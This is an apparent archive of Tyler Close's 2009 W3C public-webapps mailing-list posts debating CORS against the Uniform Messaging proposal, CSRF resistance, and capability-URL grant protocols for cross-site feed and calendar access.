Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-15 Thread Tyler Close
On Mon, Dec 14, 2009 at 4:26 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Mon, Dec 14, 2009 at 2:38 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com wrote:
 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

 And so we use the alternate, no-copy-paste design on IE while waiting
 for a better world; one in which users can safely copy data between
 web pages.

Just so that everyone knows, IE has changed this policy, so it's not a
situation where we'll be waiting forever. See:

http://msdn.microsoft.com/en-us/library/bb250473(VS.85).aspx

Adam, were you aware of this policy change?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 10:16 AM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 5:53 AM, Jonathan Rees j...@creativecommons.org 
 wrote:
 The only complaint I know of regarding UM is that it is so complicated
 to use in practice that it will not be as enabling as CORS

 Actually, Tyler's UM protocol requires the user to confirm message 5
 to prevent a CSRF attack.  Maciej's CORS version of the protocol
 requires no such user confirmation.  I think it's safe to say that
 asking the user to confirm security-critical operations is not a good
 approach.

For Ian Hickson's challenge problem, I came up with a design that does
not require any confirmation, or any other user interaction. See:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/1232.html

That same design can be used to solve Maciej's challenge problem.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Next Steps for CORS and Uniform Messaging [Was: Re: CORS versus Uniform Messaging?]

2009-12-14 Thread Tyler Close
Hi Art,

Yes, I'm happy to serve as editor for UM, as indicated by #1 below. I
will also contribute to the discussion needed for the CORS vs UM
comparison document for #3 below.

--Tyler

On Mon, Dec 14, 2009 at 3:57 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Hi All,

 Given the feedback on this thread, my proposal on the next steps are:

 1. Mark and/or Tyler prepare a FPWD of UM

 2. Anne proactively drive CORS to LCWD

 3. Before we begin a CfC to publish #1 and #2 above, some combination of the
 active participants in the CORS and UM discussions (Adam, Anne, Jonas,
 Maciej, Hixie, Tyler, Mark, etc.) create a comparison document of CORS and
 UM (e.g. pros, cons, overlaps, etc.) as Nikunj did for the group's two DB
 specs [1]. This document does not necessarily need to be exhaustive. Who can
 commit to helping with this document?

 -Art Barstow

 [1] http://www.w3.org/2008/webapps/wiki/Database


 On Dec 10, 2009, at 1:53 PM, Barstow Art (Nokia-CIC/Boston) wrote:

 CORS and Uniform Messaging People,

 We are now just a few weeks away from the February 2006 start of what
 has now become the CORS spec. In those four years, the model has been
 significantly improved, Microsoft deployed XDR, we now have the
 Uniform Messaging counter-proposal. Meanwhile, the industry doesn't
 have an agreed standard to address the important use cases.

 Although we are following the Darwinian model of competing specs with
 Web SQL Database and Indexed Database API, I believe I'm not alone in
 thinking competing specs in the CORS and UM space is not desirable
 and perhaps even harmful.

 Ideally, the group would agree on a single model and this could be
 achieved by converging CORS + UM, abandoning one model in deference
 to the other, etc.

 Can we all rally behind a single model?

 -Art Barstow


 On Dec 4, 2009, at 1:30 PM, ext Mark S. Miller wrote:

 We intend that Uniform Messaging be adopted instead of CORS. We intend
 that those APIs that were expected to utilize CORS (SSE, XBL) instead
 utilize Uniform Messaging. As for XHR2, we intend to propose a similar
 UniformRequest that utilizes Uniform Messaging.

 We intend the current proposal, Uniform Messaging Level One, as an
 alternative to the pre-flight-less subset of CORS. As for the
 remaining Level Two issues gated on pre-flight, perhaps these are best
 addressed after we settle the SOP restrictions that server-side app
 authors may count on, which therefore protocols such as CORS and
 Uniform Messaging must uphold.


 On Fri, Dec 4, 2009 at 10:04 AM, Arthur Barstow
 art.bars...@nokia.com wrote:

 Mark, Tyler,

 On Nov 23, 2009, at 12:33 PM, ext Tyler Close wrote:

 I made some minor edits and formatting improvements to the document
 sent out on Friday. The new version is attached. If you read the
 prior
 version, there's no need to review the new one. If you're just
 getting
 started, use the attached copy.

 Would you please clarify your intent with your Uniform Messaging
 proposal
 vis-à-vis CORS and your expectation(s) from the Working Group?

 -Art Barstow








-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 2:38 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com wrote:
 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

And so we use the alternate, no-copy-paste design on IE while waiting
for a better world; one in which users can safely copy data between
web pages.

I imagine many passwords and other PII are made vulnerable by IE's
clipboard policy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 3:04 PM, Maciej Stachowiak m...@apple.com wrote:

 On Dec 14, 2009, at 2:38 PM, Adam Barth wrote:

 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com
 wrote:

 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

 Information that's copied and pasted is highly likely to leak in other ways
 than just the IE paste behavior. For example, if it looks like a URL, users
 are likely to think it's a good idea to do things like share the URL with
 their friends, or to post it to a social bookmark site, or to Twitter it, or
 to send it in email. Even if it does not look like a URL, users may think
 they need to save it (likely somewhere insecure) so they don't forget.

I think the user would only be tempted to post the URL to the world if
the returned representation was interesting to talk about. That
doesn't need to be the case.

In any case, like I said earlier, if you think copy-paste is evil,
I've provided alternate designs that avoid it.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Sun, Dec 13, 2009 at 6:15 PM, Maciej Stachowiak m...@apple.com wrote:
 There seem to be two schools of thought that to some extent inform the
 thinking of participants in this discussion:
 1) Try to encourage capability-based mechanisms by not providing anything
 that lets you extend the use of origins and cookies.
 2) Try to build on the model that already exists and that we are likely
 stuck with, and provide practical ways to mitigate its risks.

My own perspective on this is:
3) In scenarios involving more than 2 parties, the ACL model is
inherently vulnerable to CSRF-like problems. So, for cross-origin
scenarios, a non-ACL model solution is needed.

The above is a purely practical perspective. When writing or auditing
code, UM provides a way to eliminate an entire class of attacks. I
view it the same way I do moving from C to a memory safe language to
avoid buffer overflow and related attacks.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-10 Thread Tyler Close
On Thu, Dec 10, 2009 at 1:48 AM, Ian Hickson i...@hixie.ch wrote:
 On Wed, 9 Dec 2009, Tyler Close wrote:

 If you're willing to tolerate a little bit of implementation mechanism,
 I can do you one better on the UI side.

 Generally speaking, server-to-server communication is highly undesireable,
 as it requires far more work on all sides.


 From the user's perspective, the UI will be:

  - User visits site B and says nothing unique to site B.
  - Users sees his data from site A on site B.

 Meaning the user won't have to start a login session with site A before
 using site B. They can just go to site B and immediately get full
 functionality.

 For each user:
 1. Site B generates an unguessable token and associates it with a user 
 account.
 2. A page from Site B does an HTML form post of the token to Site A.
 3. Server-side, Site A sends a request to Site B containing the token
 and the corresponding unguessable user feed URL.
 4. Site B stores the feed URL in the user account.
 5. From then on, a page from Site B can do a direct GET on the feed
 URL. Steps 1 through 4 are a one-time setup.

 All of the above is invisible to the user. There are no user actions
 required. The implementation is fairly straightforward and the UI is
 strictly superior to your ideal UI.

 How is the user recognised if he gives nothing unique to site B and
 doesn't login to site A?

OK, here's a fuller description of the exchange, that also meets the
new requirement of no server-to-server communication:

Initial assumptions:
- Site A wants to give Site B access to all user feeds.
- Site A and Site B do *not* share a username namespace, such as
OpenID, so Site A is unable to just give Site B a table mapping
usernames to unguessable URLs for feeds.
- No server-to-server communication is allowed.
- No user actions are allowed.

There are two phases to the solution.
Grant: Site A grants Site B permission to access a particular user
feed. This is a one-time setup operation per user account. In this
phase, it is assumed that the user is either logged into Site A, or
will log into the site on the first navigation request to the site.
Exercise: Site B reads the feed. This happens every time the feed is
accessed. In this phase, the user may or may not be logged into Site
A, it doesn't matter. The user is logged into Site B.

So, whereas your CORS based solution requires a login to Site A for
both phases, the UMP solution only requires a one-time login to Site A
for the Grant Phase.

Grant Phase:
1. User logs into Site B.

2. Site B generates an unguessable token (to be used for CSRF
protection on a subsequent request) and associates it with the user
account.

3. A page from Site B does an HTML form post of the token to Site A,
using a URL like https://A/getfeed?csrf=asdf. The csrf query
string parameter holds the unguessable token generated in step 2.

4. Site A receives a POST request containing the user's login cookies
and the csrf token. Site A generates (or looks up) an unguessable URL
for the user's feed. Site A responds with a 303 back to Site B that
contains the feed URL and the csrf token, such as
https://B/gotfeed?csrf=asdffeed=xxx. The feed query string
parameter holds the unguessable URL for the user's feed.

5. Site B receives a GET request containing the user's login cookies,
the csrf token and the feed URL. Site B does a lookup for the expected
csrf token in the user's account. If the csrf token is not the
expected one, Site B stops processing the request. Site B discards the
csrf token. Site B stores the feed URL in the user's account. Site B
responds with the normal, post-login user home page.

Excercise Phase:
1. A page from Site B gets the user feed URL from the user's account
and uses a UniformRequest (XHR-like protocol for uniform requests) to
do a GET request.

2. Site A receives a GET request on a feed URL, looks up the
corresponding feed data and returns it, along with the same-origin
opt-out header.


You can think of the funny little dance that the Grant Phase does as a
way for Site A and Site B to conspire to force the user to do the
copy-paste operation on the feed URL. Personally, I'd want Site B to
support showing feeds from an unbounded set of sites, and would be
content to do the copy-paste. For Ian's scenario, I've shown that you
don't have to do it that way. The UI is strictly better than the one
Ian had envisioned, since repeated login to Site A is no longer
required. The algorithm also meets all the arbitrary constraints
placed on its operation.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-10 Thread Tyler Close
On Thu, Dec 10, 2009 at 12:19 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 10 Dec 2009, Tyler Close wrote:
 On Thu, Dec 10, 2009 at 10:17 AM, Ian Hickson i...@hixie.ch wrote:
  That looks _really_ complicated.

 By many measures, your CORS based solution is more complicated.

 The measure I care about is how easy is it to explain and implement. By
 that measure, CORS is simpler. (It's not my solution, by the way; I
 personally haven't really been involved in CORS' development and don't
 really have a horse in this race.)

By your CORS based solution, I meant your solution to providing Site
B with access to a feed hosted by Site A. I meant your *use* of CORS
for this example, not CORS itself.

In terms of ease of explanation, if you're willing to let the user do
a single copy-paste operation, much of the complexity melts away.
Start with that explanation and then refer them to the appendix for a
design that avoids the copy-paste if they think that user gesture is
evil.

 1. It requires a login to Site A for every login to Site B, wheres the
 UMP solution does not. That means the UMP solution has:
 - fewer HTTP requests across the full lifetime of the interaction
 - fewer user interactions across the full lifetime of the interaction

 In practice, Site A has a login mechanism already, so this isn't a big
 deal. (If it didn't, then it wouldn't have per-user data that it could
 expose to multiple other sites.)

I wasn't counting new lines of code to be written. I was counting the
requests generated by that code and the user gestures required.

 2. It creates a CSRF-like vulnerability. In an interaction with Site C,
 Site B must be careful with how it handles the response to a GET request
 done on at the direction of Site C. For the GET request, Site C could
 provide the well-known URL for user feeds. A page from Site B could then
 inadvertently expose this data to Site C because the code wasn't written
 with the expectation that Site A might be involved.

 This only happens if you use URIs as tokens, which I strongly believe is a
 bad idea in general. It's simpler, and safe, not to.

In the sentence above, are you using the word token as a synonym for
identifier?

 3. The CORS solution is not implementable for popular user agents today.
 The XDR API does not support the kind of request the CORS solution needs
 to make. The UMP solution can be implemented in a cross-platform way
 today (the code needs browser specific customizations for different
 constructor names and parameters, but it can work).

 Indeed. Today that's what people do. It's complicated and I'd like us to
 provide a simpler solution.

I guess we just disagree on what counts as complexity.

 The UMP spec may not be exactly what you had in mind; but I believe I've
 shown that it meets all the requirements, is safer, and represents a
 consensus amongst current deployments.

 I honestly think that any benefit that might be reaped from avoiding
 sending the Origin explicitly is completely outweighed by the risks
 involved in having such a complicated implementation.

The scenario you outlined requires more than just the Origin header,
it also requires the user cookies. Adding the Origin header by itself
wouldn't eliminate any complexity. It would create CSRF-like problems.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-09 Thread Tyler Close
On Wed, Dec 9, 2009 at 1:39 AM, Ian Hickson i...@hixie.ch wrote:
 On Tue, 8 Dec 2009, Tyler Close wrote:

 I assume you want to move on to the XHR-like example, so I've just got a
 few clarification questions about it...

 The examples are equivalent as far as I can tell. Both are important; for
 me, the video one is more important since I'm editing the spec that will
 need to define how to work with video.

Since the examples are equivalent, I'll stick to the XHR one for now,
since I'm not sure I fully understand the video one yet.

 On Tue, Dec 8, 2009 at 11:18 AM, Ian Hickson i...@hixie.ch wrote:
  http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html
 
  To recast the question in terms of XMLHttpRequest, how would one label a
  static resource on an intranet server, e.g.:
 
    http://marketing.corp.example.com/productcodes.xml
 
  ...such that it can be read (using XMLHttpRequest) by scripts embedded on
  pages from the following hosts:
 
    http://www.corp.example.com/
    http://finance.corp.example.com/
    http://eng.corp.example.com/
    http://intranet.example.com/
 
  ...but such that it could _not_ be read by pages from the following hosts
  (i.e. the HTTP response would not be made accessible to scripts on pages
  from these hosts):
 
    http://hostile-blog.example.com/
    http://www.hostile.example/

 Are you saying a firewall prevents the author of the attack pages from
 directing his own browser to any of the legitimate pages that have
 access to the data?

 I don't think the firewall situation is really relevant, but for the sake
 of argument, let's say that the user is inside the fireall (or on VPN),
 and that *.corp.example.com are only accessible inside the firewall, and
 that intranet.example.com is accessible outside but only through TLS and
 with strong client authentication, and that hostile-blog.example.com and
 www.hostile.example are accessible outside without authentication.

The firewall situation determines whether or not an attacker can
access the secret data directly, rather than via an attack page. I see
that for intranet.example.com, you've replaced the firewall with TLS
and strong client authentication. That should serve the same purpose,
if we assume that no attackers have an account on
intranet.example.com.

 So, all the resources with access to the secret data are hosted by
 servers behind a firewall; and all the attackers are outside the
 firewall?

 No.

I assume that's a no to the first clause only, since an attacker
behind the firewall has direct access to the secret data. As discussed
in the previous paragraph, you've added TLS and client authentication
to intranet.example.com, so that it can live outside the firewall.

 Furthermore, all the resources with access to the secret data are
 trusted to not send the secret data to the attacker?

 Yes, the resources who should be able to read the secret data are trusted
 not to send the data to untrusted third parties.


 It also seems that any resource hosted behind the firewall also has
 access to the secret data, since it can just send a request
 server-to-server, instead of server-to-browser-to-server. True?

 In this example, yes, the resource on marketing.corp.example.com is not
 protected from direct access in any way other than via the firewall.

OK, so the whitelist of four sites with access to the data also
implicitly includes all sites behind the firewall.

 A more realistic example would probably have the resource protected from
 direct access by cookie-based authentication, but for the time being I
 think it's simpler to focus on the example without _user_ authentication
 being present also.

Ok, then for this initial simpler case, the simplest UMP solution that
satisfies the stated security constraints is for marketing to put the
product codes at a URL like:

https://marketing.corp.example.com/productcodes/?s=42tjiyrvnbpoal

, where the value of the s query string parameter is an unguessable secret.

A GET response from this URL is served with the same-origin opt-out header.

The product code URL is then given to all sites that should have
access to the data. The data display page at these sites starts by
getting a copy of the product code URL. The HTTP response that returns
the product code URL must either be protected by some access-control
mechanism, or not include the same-origin opt-out header. The data
display page can then use an UMP XHR to access the product code data
using the product code URL.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-09 Thread Tyler Close
On Wed, Dec 9, 2009 at 7:43 AM, Ian Hickson i...@hixie.ch wrote:
 Ok, let's move on to a more complex case.

 Consider a static resource that is protected by a cookie authentication
 mechanism. For example, a per-user static feed updated daily on some
 server by some automated process. The server is accessible on the public
 Web. The administrator of this service has agreements with numerous
 trusted sites, let's say a dozen sites, which are allowed to fetch this
 file using XHR (assuming the user is already logged in). The sites that
 fetch this file do not require authentication (e.g. one could be my portal
 page, which is just a static HTML page, without any server-side script).
 Other sites must not be allowed access to the file.

 How does one configure the server to handle this case?

Again going with the simplest thing that could possibly work:

Each of the per-user static feeds is referenced by a unique
unguessable URL of the same format used in the previous example. For
example,

https://example.com/user123/?s=42tjiyrvnbpoal
https://example.com/user456/?s=sdfher34nvl34
...

Again, a GET response from such a URL carries the same-origin opt-out header.

The user gives this URL only to those services he wants to access the
feed. For example, you could copy this URL into your personal static
HTML page that acts as your portal.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-08 Thread Tyler Close
Hi Ian,

To answer your question, I need a better understanding of what
semi-public means. At first blush, it sounds a little bit like
semi-pregnant. More inline below...

On Tue, Dec 8, 2009 at 6:16 AM, Ian Hickson i...@hixie.ch wrote:

 I'm trying to understand this proposal and how it would interact with
 Server-sent Events, XBL2, canvas/img, and video:

We're not proposing changing the existing security model of the img
tag, since that would break existing sites. A new img-like tag that
supports UMP might be a good thing to have though.


   
 http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html

 How would one label a static resource on an intranet server, e.g.

   http://videos.corp.example.com/tgif/2009-12-11.ogg

 ...such that it can be used by the pages on the following hosts:

   http://www.corp.example.com/
   http://moma.corp.example.com/
   http://tgif.corp.example.com/
   http://intranet.example.com/

 ...but such that it could _not_ be used by pages on the following hosts:

   http://hostile-blog.example.com/

What exactly do you mean by used? Do you mean that the blog site
author cannot obtain the bytes in the OGG file?

For now, my best guess at your meaning is that you want some way to
prohibit deep-linking to publicly accessible resources. Is that what
you mean? If so, then I gather you're using a static OGG file as part
of a bandwidth stealing argument. Am I following? If so, then I'm
not sure how the intranet part plays into the scenario.

I think we need to clarify the exact scenario and the access control
rules being enforced before proceeding For example, who can read and
write what, what do they want to do, and who must not be able to read
or write what.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-08 Thread Tyler Close
Hi Ian,

I assume you want to move on to the XHR-like example, so I've just got
a few clarification questions about it...

On Tue, Dec 8, 2009 at 11:18 AM, Ian Hickson i...@hixie.ch wrote:
 http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html

 To recast the question in terms of XMLHttpRequest, how would one label a
 static resource on an intranet server, e.g.:

   http://marketing.corp.example.com/productcodes.xml

 ...such that it can be read (using XMLHttpRequest) by scripts embedded on
 pages from the following hosts:

   http://www.corp.example.com/
   http://finance.corp.example.com/
   http://eng.corp.example.com/
   http://intranet.example.com/

 ...but such that it could _not_ be read by pages from the following hosts
 (i.e. the HTTP response would not be made accessible to scripts on pages
 from these hosts):

   http://hostile-blog.example.com/
   http://www.hostile.example/

Are you saying a firewall prevents the author of the attack pages from
directing his own browser to any of the legitimate pages that have
access to the data? So, all the resources with access to the secret
data are hosted by servers behind a firewall; and all the attackers
are outside the firewall? Furthermore, all the resources with access
to the secret data are trusted to not send the secret data to the
attacker? It also seems that any resource hosted behind the firewall
also has access to the secret data, since it can just send a request
server-to-server, instead of server-to-browser-to-server. True?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Patent disclosure for UniMess? [Was: [cors] Uniform Messaging, a CSRF resistant profile of CORS]

2009-12-07 Thread Tyler Close
Hi Art,

For the Status of this Document section, I just copied the text
recommended at:

http://www.w3.org/2005/03/28-editor-style.html

I did not mean to obfuscate any patent disclosure issues. I personally
do not know of any relevant patents.

--Tyler

On Sun, Dec 6, 2009 at 5:27 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Mark, Tyler,

 *IF* this proposal was a WG document, its Status of the Document section
 would include a patent disclosure requirement like the one in CORS:

 [[
 http://www.w3.org/TR/2009/WD-widgets-access-20090804/

 An individual who has actual knowledge of a patent which the individual
 believes contains Essential Claim(s) must disclose the information in
 accordance with section 6 of the W3C Patent Policy.
 ]]

 Would you two (and anyone else that contributed to the UniMess proposal)
 please make a patent disclosure for your proposal?

 -Art Barstow


 On Nov 23, 2009, at 12:33 PM, ext Tyler Close wrote:

 I made some minor edits and formatting improvements to the document
 sent out on Friday. The new version is attached. If you read the prior
 version, there's no need to review the new one. If you're just getting
 started, use the attached copy.

 Thanks,
 --Tyler

 On Fri, Nov 20, 2009 at 5:04 PM, Tyler Close tyler.cl...@gmail.com
 wrote:

 MarkM and I have produced a draft specification for the GuestXHR
 functionality we've been advocating. The W3C style specification
 document is attached. We look forward to any feedback on it.

 We agree with others that GuestXHR was not a good name and so have
 named the proposal Uniform Messaging for reasons elaborated in the
 specification.

 To parallel the CORS separation of policy from API, this first
 document is the policy specification with an XMLHttpRequest-like API
 yet to follow.

 Abstract:
 
 This document defines a mechanism to enable requests that are
 independent of the client's context. Using this mechanism, a client
 can engage in cross-site messaging without the danger of
 Cross-Site-Request-Forgery and similar attacks that abuse the cookies
 and other HTTP headers that form a client's context. For example, code
 from customer.example.org can use this mechanism to send requests to
 resources determined by service.example.com without further need to
 protect the client's context.
 

 Thanks,
 --Tyler




 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.htmldraft.html





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-16 Thread Tyler Close
On Fri, Nov 13, 2009 at 6:45 PM, Devdatta dev.akh...@gmail.com wrote:

 Some parts of the protocol are not clear to me. Can you please clarify
 the following :
 1 In msg 1, what script context is the browser running in ? Site A or
 Site B ? (in other words who initiates the whole protocol ?)

 Server A, or a bookmark.

 Wasn't Maciej's original scenario that of a user going to Site B (an
 event's site) and adding stuff to his calendar at A ? In such a
 scenario, the complete protocol should ideally start with B.

There are two parts to Maciej's scenario: the access grant (get
permission to use the calendar) and the use of access (add an event to
the calendar). Maciej starts the first at Server A (the calendar site)
and the second at Server B (the upcoming events site). Our proposed
solution does the same as Maciej's proposal.

See:

http://sites.google.com/site/guestxhr/maciej-challenge

If you want to try working on a different scenario that starts both
steps at Server B, that's fine. With the same techniques applied in
Maciej's scenario, you should be able to construct a solution to the
new scenario.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] unaddressed security concerns

2009-11-16 Thread Tyler Close
On Thu, Nov 5, 2009 at 9:59 PM, Maciej Stachowiak m...@apple.com wrote:

 Hi Tyler,

 On Nov 5, 2009, at 5:48 PM, Tyler Close wrote:

 Closing remark:

 In another thread, you've written I do think that a way to do an
 anonymous XHR is justified, so I don't know how much sense it makes
 to continue this thread. You put so much effort into this email that I
 felt I owed you a response.

 Let me make sure I understand your position and overall goal in this
 discussion. Is it:

 A) An API to do anonymous XHR (such as GuestXHR) should be provided *AND*
 CORS should be abandoned (and perhaps removed from implementations shipping
 it.

 OR:

 B) An API to do anonymous XHR (such as GuestXHR) should be added, but you
 can live with CORS continuing to exist.


 I thought your position was (A). If it is in fact (B), then perhaps we have
 all invested more energy than necessary in this debate, because I don't
 think (B) is especially controversial. But if your position is (A), then the
 statement you quoted wasn't meant to agree with that position (in case it
 wasn't clear).

MarkM and I have been arguing for position (A), and will continue to
do so, but getting an agreement on (B) is valuable. When I saw your
agreement to (B), I wanted to make sure that didn't get lost in the
noise around the debate of (A). To further assist this, MarkM and I
are currently working on a fully formed specification for GuestXHR.
I'm tempted to push on that and pause the debate on (A) until we have
WG consensus on this new spec. With the good tool in place, arguing to
drop the bad one carries less risk.

 That being said, I feel the input from you and Mark and the ensuing
 discussion has helped the Working Group get a better understanding of the
 security issues in this area, and I believe it will help us make a
 high-quality Security Considerations section. So if you have further replies
 in mind that would help inform the conversation, then please feel encouraged
 to send them.

I'm glad you've found this discussion worthwhile and thank you for
saying so. I think the slide set you put together was also a great
help to the discussion. We do have further analysis we'd like to
contribute on (A) and DBAD, but for at least the short term, I'd like
to focus on getting GuestXHR in place. Expect a first draft of that
this week...

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-13 Thread Tyler Close
Hi Devdatta,

On Thu, Nov 12, 2009 at 12:27 AM, Devdatta dev.akh...@gmail.com wrote:
 Hi Tyler,

 Some parts of the protocol are not clear to me. Can you please clarify
 the following :
 1 In msg 1, what script context is the browser running in ? Site A or
 Site B ? (in other words who initiates the whole protocol ?)

Server A, or a bookmark.

 2 Msg 3 is a form POST or a XHR POST ? If the latter , 5 needs to be
 marked as a GuestXHR

Msg 3 is a form POST, so that the response can redirect the browser to Server B.

 3 The 'secret123' token : Does it expire? If yes when/how ? Also, if
 it expires, will the user have to again confirm the grant from A ?

As presented, the token does not expire. If you want it to expire, the
simplest implementation would be to simply redo the introduction step.
Another alternative is to have Server B ask Server A for a fresh
secret by sending a request containing the previous secret. After the
initial introduction, Server B has Server A's URL and a shared secret
for authorization, so you can use that to bootstrap communication
between the two servers.

 Thanks
 Devdatta

My pleasure,
--Tyler


 2009/11/10 Tyler Close tyler.cl...@gmail.com:
 I've elaborated on the example at:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I've tried to include all the information from our email exchange.
 Please let me know what parts of the description remain ambiguous.

 Just so that we're on the same page, the prior description was only
 meant to give the reader enough information to see that the scenario
 is possible to implement under Maciej's stated constraints. I expected
 the reader to fill in their favored technique where that choice could
 be done safely in many ways. Many of the particulars of the design
 (cookies vs URL arguments, 303 vs automated form post, UI for noting
 conflicts) can be done in several different ways and the choice isn't
 very relevant to the current discussion. All that said, I'm happy to
 fill out the scenario with as much detail as you'd like, if that helps
 us reach an understanding.

 --Tyler

 On Thu, Nov 5, 2009 at 8:31 PM, Adam Barth w...@adambarth.com wrote:
 You seem to be saying that your description of the protocol is not
 complete and that you've left out several security-critical steps,
 such as

 1) The user interface for confirming transactions.
 2) The information the server uses to figure out which users it is talking 
 to.

 Can you please provide a complete description of your protocol with
 all the steps required?  I don't see how we can evaluate the security
 of your protocol without such a description.

 Thanks,
 Adam


 On Thu, Nov 5, 2009 at 12:05 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Hi Adam,

 Responses inline below...

 On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

 Think of the resource at /got as like an Inbox for accepting an add
 event permission from anyone. The meta-variable A in the query
 string, along with the secret, is the URL to send events to. So a
 concrete request might look like:

 GET /got?site=https%3%2F%2Fcalendar.example.coms=secret123
 Host: upcoming.example.net

 When upcoming.example.net receives this request, it might:

 1) If no association for the site exists, add it
 2) If an existing association for the site exists respond with a page
 notifying the user of the collision and asking if it should overwrite
 or ignore.

 Notice that step 6 is a response from Site B back to the user's browser.

 Alternatively, the response in step 6 could always be a confirmation
 page asking the user to confirm any state change that is about to be
 made. So, the page from the upcoming event site might say:

 I just received a request to add a calendar to your profile. Did you
 initiate this request? yes no

 Note that such a page would also be a good place to ask the user for a
 petname for the new capability, if you're into such things, but I
 digress...

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

 In the design as presented, nothing prevents this. I considered the
 mitigation presented above sufficient for Maciej's challenge. If
 desired, we could tighten things up, without resorting to an Origin
 header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

 That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server

Re: CORS Background slides

2009-11-10 Thread Tyler Close
I've updated the web page that describes the calendar access grant. See:

http://sites.google.com/site/guestxhr/maciej-challenge

More comments inline below...

On Wed, Nov 4, 2009 at 6:14 PM, Maciej Stachowiak m...@apple.com wrote:

 On Nov 4, 2009, at 6:04 PM, Maciej Stachowiak wrote:


 I forgot to mention another shared secret management risk with the
 proposed GuestXHR-based protocol. The protocol involves passing the shared
 secret in URLs, including URLs that will appear in the browser's URL field.
 URLs should not be considered confidential - there have a high tendency to
 get inadvertently exposed to third parties. Some of the ways this happens
 include caching layers, the browser history (particularly shared sync of the
 browser history), and users copying URLs out of the URL field without
 considering whether this particular URL contains a secret.

 I believe this can be fixed by always transmitting the shared secret in
 the body of an https POST rather than as part of the URL, so this risk is
 not intrinsic to this style of protocol.

 On second thought - I don't see an obvious way to change the access grant to
 avoid sending the shared secret in the URL of a GET request. You can't just
 change the 303 redirect to a 307, since the original post body did not
 contain the shared secret; and there is no way to redirect in a way that
 changes the POST body. Maybe someone else can think of a way to do it.

Personally, I think including a secret in a URL is a fine technique,
but if you want to avoid it, you could instead return a 200 response
in step 4 and have JavaScript in the page do an automated form
submission with the secret in the body of the POST request.

